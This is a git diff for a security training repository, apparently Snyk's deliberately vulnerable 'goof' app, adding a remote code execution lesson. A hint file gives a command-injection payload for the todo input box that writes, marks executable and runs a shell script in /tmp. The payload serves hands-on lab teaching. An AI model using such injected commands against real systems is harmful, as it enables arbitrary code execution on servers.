snyk-labs · realSchoki · Jun 24, 2019 · Mar 17, 2024
diff --git a/README.md b/README.md
@@ -216,6 +216,13 @@ Back on the snyk project page, find the XSS vulnerability in the ```marked``` pa
 
 After updating your application, try your hacks again. Congratulations, you’ve remediated the XSS vulnerability and shouldn’t be able to embed JavaScript on the web page any longer.
 
+## Remote Code Excecution
+
+If a developer is using exec-commands to execute system tools he has to be sure, that there is no way escaping the command string. 
+Best practice is not using commands like exec.
+
+Click to see [Hint 1](rce/hint1.md).
+
 # Java Goof Installation
 
 Depending on your choice before pick the appropriate install manual

diff --git a/rce/1.md b/rce/1.md
@@ -0,0 +1,13 @@
+Take a look at app.js and find out what is happening, if you create a todo.
+
+Check out the route mapping under routes/index.js.
+
+Find vulnerable exec command.
+
+Just put...
+
+```
+![alt text](https://its-me-dennis.ovh/wp-content/uploads/2019/05/photo504663614128498900.jpg || echo '#!/bin/bash\n#bad stuff happening' > /tmp/extracted_files/exploit.sh && chmod +x /tmp/extracted_files/exploit.sh && /tmp/extracted_files/exploit.sh" hax0r
+```
+
+in the input box an have fun (simply via webbrowser, in my case Chromium 75.0.3770.90).